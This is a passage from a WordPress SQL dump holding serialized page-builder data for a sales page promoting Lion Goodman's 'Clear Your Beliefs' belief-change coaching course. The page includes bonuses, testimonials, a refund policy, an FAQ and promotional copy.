coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1598, 2039, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and 